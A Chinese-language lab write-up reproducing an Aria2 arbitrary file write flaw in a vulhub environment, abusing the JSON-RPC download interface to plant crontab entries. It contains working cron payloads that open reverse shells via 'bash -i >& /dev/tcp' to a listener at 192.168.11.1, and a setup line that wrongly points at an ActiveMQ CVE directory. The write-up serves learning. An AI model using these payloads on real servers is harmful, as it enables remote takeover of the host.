Aria2 任意文件写入漏洞
1.漏洞影响版本
没有查到,按照vulhub部署的版本,认为是Aria2<1.18.8
2.漏洞危害
任意文件上传,导致RCE(远程命令执行)
3.漏洞POC
部署虚拟机
cd /rootcd /vulhub/activemq/CVE-2016-3088 ////进入本次复现的vulhub目录
docker-compose up -d ////docker-compose搭建环境

因为rpc通信需要使用json或者xml,不太方便,所以我们可以借助第三方UI来和目标通信,如 Yet Another Aria2 Web Frontend 。
通信地址:http://192.168.11.129:6800/jsonrpc

第一种/etc/crontab为bash
通过写入一个crond任务来反弹shell
shell内容,注意使用linux生成:
*/1 * * * * root bash -i >& /dev/tcp/192.168.11.1/4444 0>&1
上传的文件使用命令查看内容,文件末尾要有\n:
od -c -t x2 shell

使用python搭建http服务:
python -m SimpleHTTPServer 80


第二种/etc/crontab中的shell为sh

使用linux生成需要上传的shell为:
*/1 * * * * root echo "#!/bin/bash" > /etc/cron.d/crontabshell
*/1 * * * * root echo "bash -i >& /dev/tcp/192.168.11.1/7777 0>&1" >> /etc/cron.d/crontabshell
*/1 * * * * root chmod +x /etc/cron.d/crontabshell
*/1 * * * * root /etc/cron.d/crontabshell

4.复盘
最开心的一次漏洞复现
漏洞复现原因
使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞。
复习巩固
1./etc/cron.d反弹shell
2.od查看隐藏字符
3.python搭建简易http
网友评论